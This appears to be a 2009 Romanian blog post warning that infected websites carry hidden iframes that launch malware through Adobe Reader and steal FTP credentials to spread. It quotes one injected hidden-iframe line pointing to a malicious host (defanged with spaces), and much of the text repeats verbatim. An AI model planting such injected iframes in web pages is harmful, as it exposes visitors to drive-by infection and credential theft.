Site-uri infectate - din cauza la Adobe Reader?!
Scris: 29-Iul-2009, 00:45:33
Ei bine... imi veti spune: "ce legatura are securitatea site-urilor cu Adobe Reader?" O sa incerc sa-mi dau seama si eu pe masura ce explic situatiile paranormale ce mi s-au intamplat in ultimele zile.
Din ce in ce mai multe site-uri sunt infectate cu niste scripturi dubioase. In codul paginilor am gasit iframe-uri care incarca si executa alte treburi:
<iframe src="http:// q5m.ru: 8080/index.php" width=123 height=111 style="visibility: hidden"></iframe> (am pus niste spatii in link, nu-l accesati)
M-am ales cu un virus in urma unei simple navigari pe internet. Voi da linkurile a catorva site-uri de genul daca va intereseaza.
Inteleg ca un virus se poate downloada in background, dar cum dracu reuseste sa se si deschida?! Ei bine, cu ajutorul la Adobe Reader. Momentan am sters executabilul de la Adobe pana gasesc o solutie mai buna.
In momentul cand am accesat site-ul respectiv am observat ceva ciudat. Mi-a aparut logo-ul de la Adobe Reader ca si cum se deschide un fisier PDF (pagina respectiva era in format php!). Am dat CTR + ALT + DEL si am gasit cateva procese ciudate. Deja virusul era "on" si-si facea treburile cu grija. Ce facea defapt acel virus? Fura datele de la conturile FTP care mai apoi le folosea pentru a infecta alte site-uri. Ce n-am inteles e cum a reusit sa se si deschida programelul (virusul), doar accesand o pagina PHP.
Nu mai stiu link-ul site-ului, insa am mai descoperit in urmatoarele zile alte cateva site-uri cu acelasi fenomen.
E posibil ca Adobe Reader sa aiba o gaura de securitate, si permite cumva executia si a fisierelor executabile, nu doar a fisierelor de format PDF.
Pe scurt, aveti grija la PDF-uri, nu intotdeauna Google avertizeaza ca "site-ul poate dauna calculatorului dumneavoastra".
Din ce in ce mai multe site-uri sunt infectate cu niste scripturi dubioase. In codul paginilor am gasit iframe-uri care incarca si executa alte treburi:
<iframe src="http:// q5m.ru: 8080/index.php" width=123 height=111 style="visibility: hidden"></iframe> (am pus niste spatii in link, nu-l accesati)
M-am ales cu un virus in urma unei simple navigari pe internet. Voi da linkurile a catorva site-uri de genul daca va intereseaza.
Inteleg ca un virus se poate downloada in background, dar cum dracu reuseste sa se si deschida?! Ei bine, cu ajutorul la Adobe Reader. Momentan am sters executabilul de la Adobe pana gasesc o solutie mai buna.In momentul cand am accesat site-ul respectiv am observat ceva ciudat. Mi-a aparut logo-ul de la Adobe Reader ca si cum se deschide un fisier PDF (pagina respectiva era in format php!). Am dat CTR + ALT + DEL si am gasit cateva procese ciudate. Deja virusul era "on" si-si facea treburile cu grija. Ce facea defapt acel virus? Fura datele de la conturile FTP care mai apoi le folosea pentru a infecta alte site-uri. Ce n-am inteles e cum a reusit sa se si deschida programelul (virusul), doar accesand o pagina PHP.
Nu mai stiu link-ul site-ului, insa am mai descoperit in urmatoarele zile alte cateva site-uri cu acelasi fenomen.
E posibil ca Adobe Reader sa aiba o gaura de securitate, si permite cumva executia si a fisierelor executabile, nu doar a fisierelor de format PDF.
Pe scurt, aveti grija la PDF-uri, nu intotdeauna Google avertizeaza ca "site-ul poate dauna calculatorului dumneavoastra".
Insa sunt sigur ca au patit altii treburi mai urate. Observat la timp, scapi relativ usor de probleme. Problema e cu cei care nu stiu de treaba asta urata cu Adobe... Oricum, recomand dezinstalarea programului Adobe Reader sau redenumirea executabilului (si folosit doar cand este nevoie). Asta cel putin pana la o noua versiune. Sunt chiar foarte multe site-uri romanesti infectate (descopera. net de exemplu - Nu accesati site-ul)